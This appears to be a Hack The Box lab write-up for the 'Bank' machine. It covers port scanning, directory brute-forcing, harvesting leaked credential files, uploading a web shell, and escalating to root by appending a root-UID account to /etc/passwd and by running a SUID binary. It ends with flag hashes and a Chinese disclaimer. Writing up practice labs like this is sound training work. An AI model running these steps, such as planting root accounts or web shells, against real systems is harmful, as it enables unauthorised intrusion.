Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.29 | TCP:22,53,80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.10.29 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')$ nmap -Pn -sV -sC -p$ports 10.10.10.29
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
balance-transfer
# echo '10.10.10.29 bank.htb' >>/etc/hosts
http://bank.htb/login.php
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图](https://img.4awl.net/img/94/ea2b7b45a8090566abd3bed28bc7d4.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图")
$ feroxbuster -u http://bank.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图1](https://img.4awl.net/img/8c/bab144d01a0e2aefcd94645d516843.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图1")
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图2](https://img.4awl.net/img/3a/5d537b7d9ab3e8a865d8dc9de87ffa.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图2")
$ wget -q -O - http://bank.htb/balance-transfer/ | grep -oP '(?<=href="https://www.freebuf.com/articles/web/)[^"]*' | sort | uniq | while read url; do
full_url="http://bank.htb/balance-transfer/$url"
if [[ ! "$url" =~ ^http ]]; then
full_url="http://bank.htb/balance-transfer/$url"
fi
echo "Downloading: $full_url"
wget --show-progress "$full_url" -P ./opt
done
$ ls -la| sort -n |head -n 10
$ cat 68576f20e9732f1b2edc4df5b8533230.acc
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图3](https://img.4awl.net/img/ca/f97e19980d9bd194850d7f65d6da6c.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图3")
username:[email protected]password:!##HTBB4nkP4ssw0rd!##
http://bank.htb/index.php
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图4](https://img.4awl.net/img/54/b9d20044891aaa66d026654a526a22.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图4")
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图5](https://img.4awl.net/img/2c/f61faa5646698b5bb385806fc2bfaa.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图5")
http://bank.htb/support.php
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图6](https://img.4awl.net/img/f3/7bac3444bd47520653bd96d40bd775.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图6")
http://bank.htb/uploads/p0wny.htb
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图7](https://img.4awl.net/img/ff/6f75a7cd6a1412463b7ddd1a89080e.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图7")
User.txt
137646c78ff9524501409d48a3d2a2af
Privilege Escalation
Via Passwd File
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图8](https://img.4awl.net/img/14/72eb1eed17249a5951cff8cf68f9c4.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图8")
$ openssl passwd -1 -salt 123 123
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图9](https://img.4awl.net/img/58/ab1b207139a670b8d9b56c83eeca21.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图9")
$ echo 'Maptnh:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:Maptnh:/home/Maptnh:/bin/bash'>>/etc/passwd
$ su Maptnh
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图10](https://img.4awl.net/img/15/3811e09f0e04d7e4c8a717e0970879.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图10")
Via emergency SUID
www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f 2>/dev/null
www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
![[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图11](https://img.4awl.net/img/fe/bde599fa9d3253297d140494d86d72.jpg "[Meachines] [Easy] Bank balance-transfer目录泄露+etcpasswd权限提升+SUID emergency权限…插图11")
Root.txt
2bd8d9c525c16f18d779a90123fa3554
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
